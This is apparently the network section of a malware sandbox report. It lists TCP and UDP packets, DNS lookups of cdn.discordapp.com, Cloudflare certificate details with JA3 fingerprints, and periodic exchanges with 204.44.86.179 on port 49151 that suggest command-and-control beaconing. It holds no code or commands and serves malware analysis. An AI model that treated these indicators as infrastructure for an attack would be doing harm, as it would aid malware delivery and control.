Sep 7, 2021 18:17:11.974220037 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.974235058 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.974272013 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.974282026 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.974940062 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.974956989 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.974976063 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.974992037 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.975007057 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.975013018 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.975022078 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.975037098 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.975043058 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.975050926 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.975065947 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.975091934 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.975150108 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.975974083 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976022959 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976046085 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976068974 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976073027 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976094007 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976102114 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976116896 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976128101 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976144075 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976151943 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976170063 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976176977 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976192951 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976222038 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976332903 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976784945 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976815939 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976840019 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976861954 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976870060 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976885080 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976891994 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976907015 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976928949 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976929903 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976949930 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976967096 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.976980925 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.976991892 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.977072001 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.977710962 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.977731943 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.977752924 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.977790117 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.977814913 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.977977991 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.977998972 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978032112 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978053093 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978069067 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978077888 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.978095055 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978096008 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.978116035 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978131056 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978140116 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.978152990 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978173971 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.978180885 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.978204012 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.978229046 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.978993893 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979018927 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979039907 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979055882 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.979060888 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979079962 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979099035 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979130983 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979151964 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979166985 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979173899 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.979182959 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979187012 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.979191065 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.979239941 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.979892015 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979912043 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979928970 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979974031 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.979990959 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980011940 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980021954 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.980030060 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980047941 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980065107 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980072021 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.980082035 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980108023 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.980138063 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.980849981 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.980882883 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980907917 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980927944 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980948925 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980956078 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.980964899 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980979919 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.980982065 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.980998993 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981003046 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981017113 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981024981 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981034040 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981051922 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981053114 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981076956 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981105089 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981693029 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981714964 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981730938 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981745958 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981765032 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981772900 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981781960 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981796980 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981812000 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981813908 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981828928 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981843948 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981844902 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981858015 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.981873035 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.981898069 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.982656002 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982677937 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982696056 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982713938 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982732058 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982734919 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.982747078 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982764006 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982764959 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.982780933 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982788086 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.982803106 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982822895 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982831955 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.982844114 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.982861042 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.982886076 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.983608961 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983633041 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983650923 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983669996 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983686924 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983695030 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.983706951 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983724117 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983726025 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.983741045 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983757019 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.983757019 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983772993 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983779907 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.983789921 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983808041 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.983812094 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.983844995 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.983894110 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.984564066 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.984589100 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.984608889 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.984627008 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.984631062 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.984677076 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986006021 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986027002 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986041069 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986056089 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986078024 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986093998 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986099958 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986118078 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986135006 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986135960 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986156940 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986165047 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986176014 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986191034 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986197948 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986207008 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986222029 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986229897 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986241102 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986258030 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986260891 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.986285925 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.986316919 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.987617970 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987643957 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987665892 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987685919 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987698078 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.987705946 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987725973 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987735033 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.987754107 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987771988 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987788916 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.987788916 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.987814903 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.987839937 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.988451004 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.988490105 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.988512993 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.988540888 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.988571882 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.988589048 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.988610983 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.988626957 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.988646984 CEST	443	49708	162.159.135.233	192.168.2.5
Sep 7, 2021 18:17:11.988648891 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:11.988707066 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:12.072452068 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:23.683074951 CEST	49706	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:17:33.222580910 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:17:33.225366116 CEST	49707	49151	192.168.2.5	204.44.86.179
Sep 7, 2021 18:17:33.440910101 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:17:35.464597940 CEST	49708	443	192.168.2.5	162.159.135.233
Sep 7, 2021 18:18:03.237945080 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:18:03.251456976 CEST	49707	49151	192.168.2.5	204.44.86.179
Sep 7, 2021 18:18:03.472099066 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:18:33.254576921 CEST	49151	49707	204.44.86.179	192.168.2.5
Sep 7, 2021 18:18:33.258662939 CEST	49707	49151	192.168.2.5	204.44.86.179
Sep 7, 2021 18:18:33.472251892 CEST	49151	49707	204.44.86.179	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2021 18:16:28.112014055 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:16:28.151379108 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 7, 2021 18:16:40.749583960 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:16:40.787383080 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 7, 2021 18:16:54.049629927 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:16:54.109647989 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 7, 2021 18:17:01.117063999 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:17:01.160197973 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 7, 2021 18:17:01.364059925 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:17:01.399791002 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 7, 2021 18:17:11.635313988 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:17:11.671046019 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 7, 2021 18:17:22.133663893 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:17:22.166584015 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 7, 2021 18:17:37.328597069 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:17:37.372284889 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 7, 2021 18:17:41.054203033 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:17:41.091835976 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 7, 2021 18:18:12.110825062 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:18:12.145008087 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 7, 2021 18:18:13.867377996 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 7, 2021 18:18:13.915498018 CEST	53	60151	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 7, 2021 18:16:40.749583960 CEST	192.168.2.5	8.8.8.8	0x3851	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:01.364059925 CEST	192.168.2.5	8.8.8.8	0xfb4b	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:11.635313988 CEST	192.168.2.5	8.8.8.8	0x8fbf	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 7, 2021 18:16:40.787383080 CEST	8.8.8.8	192.168.2.5	0x3851	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:16:40.787383080 CEST	8.8.8.8	192.168.2.5	0x3851	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:16:40.787383080 CEST	8.8.8.8	192.168.2.5	0x3851	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:16:40.787383080 CEST	8.8.8.8	192.168.2.5	0x3851	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:16:40.787383080 CEST	8.8.8.8	192.168.2.5	0x3851	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:01.399791002 CEST	8.8.8.8	192.168.2.5	0xfb4b	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:01.399791002 CEST	8.8.8.8	192.168.2.5	0xfb4b	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:01.399791002 CEST	8.8.8.8	192.168.2.5	0xfb4b	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:01.399791002 CEST	8.8.8.8	192.168.2.5	0xfb4b	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:01.399791002 CEST	8.8.8.8	192.168.2.5	0xfb4b	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:11.671046019 CEST	8.8.8.8	192.168.2.5	0x8fbf	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:11.671046019 CEST	8.8.8.8	192.168.2.5	0x8fbf	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:11.671046019 CEST	8.8.8.8	192.168.2.5	0x8fbf	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:11.671046019 CEST	8.8.8.8	192.168.2.5	0x8fbf	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Sep 7, 2021 18:17:11.671046019 CEST	8.8.8.8	192.168.2.5	0x8fbf	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Sep 7, 2021 18:16:40.871368885 CEST	162.159.135.233	443	192.168.2.5	49699	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Sep 7, 2021 18:16:40.871368885 CEST	162.159.135.233	443	192.168.2.5	49699	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19
Sep 7, 2021 18:17:01.542766094 CEST	162.159.135.233	443	192.168.2.5	49706	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Sep 7, 2021 18:17:01.542766094 CEST	162.159.135.233	443	192.168.2.5	49706	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19
Sep 7, 2021 18:17:11.782536983 CEST	162.159.135.233	443	192.168.2.5	49708	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
